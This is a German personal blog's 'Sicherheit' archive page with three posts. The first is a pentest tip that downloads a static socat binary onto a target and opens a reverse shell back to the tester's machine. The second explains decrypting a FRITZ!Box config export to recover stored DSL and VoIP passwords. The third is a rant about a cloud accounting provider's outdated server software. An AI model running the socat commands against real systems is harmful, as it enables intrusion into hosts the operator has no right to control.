Dies ist das Archiv zu der Kategorie 'Sicherheit'.

Mit socat eine Remote-Shell spawnen

Abgelegt unter Code, Sicherheit am 22.01.2018

Weil ich dummerweise gerade wieder Strg+C gedrückt habe und mir logischerweise die netcat Remote-Shell dadurch abgenippelt ist…

Entweder ist socat schon auf dem Pentest-Opfer installiert (was zu 0,00001% der Fall ist), oder einfach per wget das entsprechende Binary holen.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

Wobei das /tmp-Verzeichnis nicht zwingend beschreibbar sein muß…
Ein chmod +x /tmp/socat dann aber auch nicht vergessen!
(sind noch ein paar ganz andere hilfreiche Binaries zu finden: https://github.com/andrew-d/static-binaries )

Auf dem eigenen Rechner (pentestrechner) dann

socat file:`tty`,raw,echo=0 tcp-listen:12345

Port 12345 ist durch einen beliebigen Port zu ersetzen, Hauptsache er ist von außen zu erreichen… ggf. Firewall/Router das Portforwading einrichten

Und mittels:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:pentestrechner:12345
klappt es dann auch mit der Remote-Shell, die einem nicht einfach mit Ctrl+C wegstirbt 😛


DSL- und sonstige Zugangsdaten (wie z.B. VoIP-Kennwort) aus der FRITZ!Box auslesen

Abgelegt unter Code, Fundstück der Woche, Sicherheit am 23.11.2017

Nachdem es ja keinen Routerzwang mehr gibt, darf ja jeder selbst ein Endgerät dranstöpseln.

Dumm nur, wenn man dann die DSL-Zugangsdaten oder den Login für den Sipgate-Account in der alten Fritzbox gespeichert hat, beim Import in die neue Box aber diese nicht zum Import angeboten werden… 🙁

Aber es gibt findige Bastler wie den Michael Engelke, die es einem sehr leicht machen…

Einfach dessen Tools runterladen, und wenn man schon PHP [CLI] auf dem System hat, kann man sich sogar das Installieren sparen.

Für Linux-Freunde sollte das selbsterklärend ablaufen, für die Windows-Fraktion gibt es wahlweise ebenfalls wieder ein Archiv zum Runterladen.
(und wenn man schon eine php.exe irgendwo im System hat, einfach die Tools in das gleiche Verzeichnis entpacken)

Einmal die Daten aus der Fritzbox exportieren, Kennwort für den Export bitte nicht vergessen!
Export-Datei auf einen etwas passableren Namen kürzen (wie z.B. config.export).

An manchen Fritzboxen benötigt man keinen Benutzernamen, da reicht dann auch nur das Kennwort. Läßt sich aber an der gleichen Stelle wie folgende Änderung umstellen.
Unter FRITZ!Box-Benutzer » Anmeldung im Heimnetz das „Ausführung bestimmter Einstellungen und Funktionen zusätzlich bestätigen“ deaktivieren.

Dann kann man auf der Kommandozeile ins entsprechende Verzeichnis wechseln, und mit:
fb_tools.bat {KennwortderFritzbox|oder|Benutzername:KennwortderFritzbox}@{IP-AdressederFritzbox} Konfig File-Decrypt {NamederExportdatei} {Exportkennwort}

Bei folgenden Demodaten würde das dann so aussehen:
IP-Adresse der Fritzbox: 192.168.178.1
Benutzername der Fritzbox: maxmustermann
Kennwort der Fritzbox: passwort
Exportdatei: config.export
Kennwort beim Export: 123456

fb_tools.bat maxmustermann:passwort@192.168.178.1 Konfig File-Decrypt config.export 123456


Bildung in Deutschland – oder warum ich mich fremdschäme

Abgelegt unter Aufklärung, Kurioses, Sicherheit am 18.10.2017

Ich habe auf puppenzirkus.com/5-online-tools-die-dein-leben-einfacher-machen/ kommentiert, daß ich persönlich meine Buchhaltung NICHT in die Cloud (in dem Fall zu papierkram.de) stecken würde.

Kommen prompt die Argumente:

– Rechenzentrum ist in Deutschland
– die haben eine Datenschutzerklärung
– ich würde disqus nutzen, ist ja auch ein fremder Dienst (der auch schon mal Datenreichtum hatte…)

Ja, fangen wir doch mal hinten an…

disqus hat von mir eine Mailadresse und ein Wegwerfkennwort. Keine sensiblen Daten. Ja, die können tracken, was für komische Kommentare ich wo abgebe, und sich daraus vielleicht was für irgendwelche Marketingstrategien zusammenschwurbeln. Das war es dann aber auch schon.

Eine Datenschutzerklärung ist auch sehr viel wert. Ich meine, von einer Firma die auf einen Schlag pleite gehen kann. Sogar die Datenschutzerklärung von Microsoft und anderen großen Firmen ist nicht mal den Strom wert den ich verbrauche, um auch nur die ersten Wörter davon zu lesen.

Aber der Burner war wieder mal: Rechenzentrum ist in Deutschland.

Wow.

Das muß man jetzt erst mal sacken lassen.

Jemand argumentiert tatsächlich, weil das Webhosting nicht in der bösen USA, sondern im Heimatland(?) Deutschland ist, dann sind die Server automatisch sicher…?

Eigentlich ist das ja schon wieder ein Anreiz für mich nach einem Dosenöffner für die Scheisse zu suchen und nur des Spaßes halber da einen PoC aufzuzeigen.
Naaa, sowas hier reicht schon: http://status.papierkram.de/incidents/bddsxnnk5xng
(davon mal abgesehen, gibts noch viel Traurigere: https://twitter.com/papierkramde )

Für all‘ die Dummen (in diesem Falle Jens, der ja auch auf Facebook seine Werbung SEHR klein kenntlich macht…), die es noch immer nicht kapiert haben: alles, was man ins Internet hochlädt, ist öffentlich, nicht mehr geheim.

ALLES.

Nachtrag:

HTTP/1.1 200 OK
Date: Wed, 18 Oct 2017 15:53:12 GMT
Server: Apache
X-Powered-By: PHP/5.4.45-0+deb7u11
Set-Cookie: PHPSESSID=v3jvie54h39hmcnmr51ne6r112; path=/
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
X-Application-Server: easyCMS 5.0
X-Associated-Content: „https://www.papierkram.de/wwwres/jquery/jquery.min.js?v=53be6fe4“
Vary: Accept-Encoding,User-Agent
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Wow, die fahren da echt Plesk und PHP 5.4…
Zwar ein Debian-Server, aber die PHP-Version war schon 09/2015 EOL
Und Debian Wheezy hat wie lange schon einen stabilen Nachfolger …?

Sollte ich wirklich mal den Landesdatenschutzbeauftragten damit konfrontieren…



blog powered by wordpress
Design by Office and IT - Business Solutions
Optimiert durch suchmaschinen-freundlich